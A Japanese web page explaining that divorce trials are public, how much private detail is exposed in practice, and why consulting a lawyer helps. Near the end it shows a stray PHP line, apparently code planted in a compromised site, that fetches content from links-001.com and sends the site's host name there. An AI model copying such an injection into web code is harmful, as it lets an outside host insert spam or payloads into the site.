前へ
次へ

離婚裁判は公開されるのが基本

離婚裁判はいきなり申し立てることはできず、必ず前段階として離婚調停がおこなわれます。調停では離婚に至った理由が問われることはありませんし、公になることもありません。これが離婚裁判に進んだ場合、裁判は公開となり、離婚を請求する理由も明らかにしなければならなくなります。裁判になることでプライベートが公開されるとなると、状況が変わって来るのは当然でしょう。裁判は公平性を規すために基本的に公開が原則であり、どんな裁判であっても誰もが傍聴を認められています。つまり離婚裁判でも公開は原則で、誰でも傍聴は可能ですから、まったく関係のない人たちに夫婦間のプライベートな問題がさらされることは否めません。実際には提出した証拠や詳細全てが裁判の場で公開されるわけではなく、主張や証拠は事前に裁判所と相手に書面で提出する形となります。公の場でそれらの内容が読み上げられることはなく、例え傍聴人が閲覧したいと思っても、別途閲覧手続きをしない限りはできないようになっています。詳細な情報がさらされることはほぼなく、プライベートがすべて暴露されるような心配はないでしょう。とは言っても社会的に公開され、プライベートな問題を白日のもとで争うストレスは大きいですし、辛さを伴うことは事実です。ただ、判決には法的な強制力がありますので、自分の生活を守るためにはどうしても争わなければならないこともあります。慰謝料や養育費など、金銭的な条件に関してももちろん働きますので、その後の生活で大きな安心を得ることができるでしょう。だからこそ、訴訟を起こすべきか否かは、誰もが非常に悩む点です。決定的な証拠が揃っていれば強いですが、裁判まで進めるべきかは状況によって一人ひとり千差万別なので一概に言えません。もし裁判にコマを進めても、和解勧告を受け入れるという選択肢もありますので、状況をよく考えて選択が必要です。いずれにせよ裁判にまで発展するなら、一人の力で解決することは困難です。迷わず弁護士へ相談し、納得できる解決を求めましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top